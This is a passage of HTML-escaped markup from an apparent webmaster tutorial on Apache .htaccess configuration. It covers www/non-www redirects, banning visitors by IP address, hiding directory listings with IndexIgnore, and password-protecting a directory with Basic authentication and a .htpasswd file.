10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;# Redirect non-www urls to www&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteEngine on&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} !^www\.yoursite\.com&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteRule (.*) http://www.yoursite.com/$1 [R=301,L]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Alternatively you can use :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;# Redirect non-www urls to www&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteEngine on&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} ^example\.com [NC]&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteRule (.*) http://www.example.com/$1 [R=301,L]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Force users to use http://yoursite.com&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;To force users to use the non www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;# Redirect www urls to non-www&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteEngine on&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} ^www\.yoursite\.com [NC]&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteRule (.*) http://yoursite.com/$1 [R=301,L]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Alternatively you can use :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;# Redirect www urls to non-www&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteEngine on&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} !^example\.com&lt;/code&gt;&lt;br /&gt;&lt;code&gt;RewriteRule (.*) http://example.com/$1 [R=301,L]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Notes about this technique&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Many popular scripts, particular content management systems (CMS’s) edit the .htaccess file and add their own redirection so you may not have to add any of the code noted above. Infact, by adding the redirection code noted above you could actually mess things up.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;For example, the popular blogging script&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.wordpress.org/&quot;&gt;WordPress&lt;/a&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;adds redirection to the .htaccess file. You simply chose the correct domain name in the admin panel and it takes care of everything else. And if you do add the code to the .htaccess file it messes things up a little. It does still redirect non-www to www (and vice versa) but it just redirects the visitor to the home page (ie. http://yoursite.com/folder1/page1 would redirect to http://yoursite.com/ instead of http://www.yoursite.com/folder1/page1).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If this sounds a little confusing, don’t worry. Just remember that certain scripts already apply a redirection and so trying to add a redirection code to the .htaccess file can mess things up, at the very least it will unlikely work the way you want it to.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;Deny a user by IP Address&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;There may come a time when you unfortunately need to ban someone from visiting your website completely. This is very easy to do using htaccess and can be useful if there is a spammer or disgruntled member attacking your site (something which unfortunately happens a lot to forum and blog owners).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;To ban someone completely all you need to do is add the following code to your .htaccess file. Simply replace the ip address below with the ip of the person you want to ban&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;#ban users from visiting the site&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;order allow,deny&lt;/code&gt;&lt;br /&gt;&lt;code&gt;deny from 123.45.6.7&lt;/code&gt;&lt;br /&gt;&lt;code&gt;allow from all&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If you want to ban more people you simply add more lines, like this :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;#ban users from visiting the site&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;order allow,deny&lt;/code&gt;&lt;br /&gt;&lt;code&gt;deny from 123.45.6.7&lt;/code&gt;&lt;br /&gt;&lt;code&gt;deny from 987.65.4.3&lt;/code&gt;&lt;br /&gt;&lt;code&gt;deny from 56.45.34.456&lt;/code&gt;&lt;br /&gt;&lt;code&gt;allow from all&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;How to Stop Directory Listing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If you have a lot of files in a directory but there is no index file, your server will list all the files in that server. This can cause a lot of problems. For example, one of the most common directories which webmasters forget to hide is the images folder. This allows everyone to view all the images in their images folder. This isn’t usually a major problem though you may have more important files in a directory, perhaps important documents or software.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You can stop this from occurring from using the following code :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;IndexIgnore *&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The * is a wildcard and stops the server from listing any type of file. You can of course only stop certain files or file types from being listed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;For example :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;IndexIgnore *.gif *.jpg *.png accounts.doc&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The above code would stop all gif, jpg and png graphics files from being listed. The accounts.doc document would be blocked too however all other .doc files would be shown. Basically the&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;IndexIgnore&lt;/em&gt;command lets you decide what files in a directory visitors can see.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You can upload an .htaccess file for every directory you want to stop people viewing but it’s more practical to place everything in your main .htaccess file (ie. your root .htaccess). To do this all you need to do is include the path to the folder(s) you want to protect.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;So to block people viewing the files at www.yoursite.com/images/ and www.yoursite.com/banners/ you would the following code to your .htaccess &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;IndexIgnore /images/*&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;IndexIgnore /banners/*&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-line-height-alt: 15.0pt;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 21.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-line-height-alt: 15.0pt;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 21.0pt; font-weight: normal;&quot;&gt;Password Protect a Directory&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Password protecting a directory is easy to do, all you have to do is :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l3 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;1.&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Add some code to your .htaccess file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l3 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;2.&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Create a file called .htpasswd&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l3 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;3.&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Select a username and generate an encrypted password and then add them to your .htpasswd file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Code to add to your Htaccess&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You need to add the following code to your .htaccessfile.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;AuthType Basic&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;AuthName &quot;&lt;/code&gt;&lt;strong&gt;Name of your secure area&lt;/strong&gt;&lt;code&gt;”&lt;/code&gt;&lt;br /&gt;&lt;code&gt;AuthUserFile /&lt;/code&gt;&lt;strong&gt;fullpath/to/your/directory&lt;/strong&gt;&lt;code&gt;/.htpasswd&lt;/code&gt;&lt;br /&gt;&lt;code&gt;require valid-user&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You need to edit the file accordingly.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l2 level1 lfo3; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Name of your secure area = You can call this anything you want ie. Secure Area or Members Area or whatever.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l2 level1 lfo3; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Full Path To Your Directory = This is the absolute path to the directory where your .htpasswd file is saved.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Here’s an example :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;AuthType Basic&lt;/code&gt;&lt;br /&gt;&lt;code&gt;AuthName &quot;Private Area&quot;&lt;/code&gt;&lt;br /&gt;&lt;code&gt;AuthUserFile /home/mysite/.htpasswd&lt;/code&gt;&lt;br /&gt;&lt;code&gt;require valid-user&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Create a file called .htpasswd&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You create a .htpasswd file the same way you&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;created the .htaccess file. All you need to do is create a blank document and save it as .htpasswd.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div 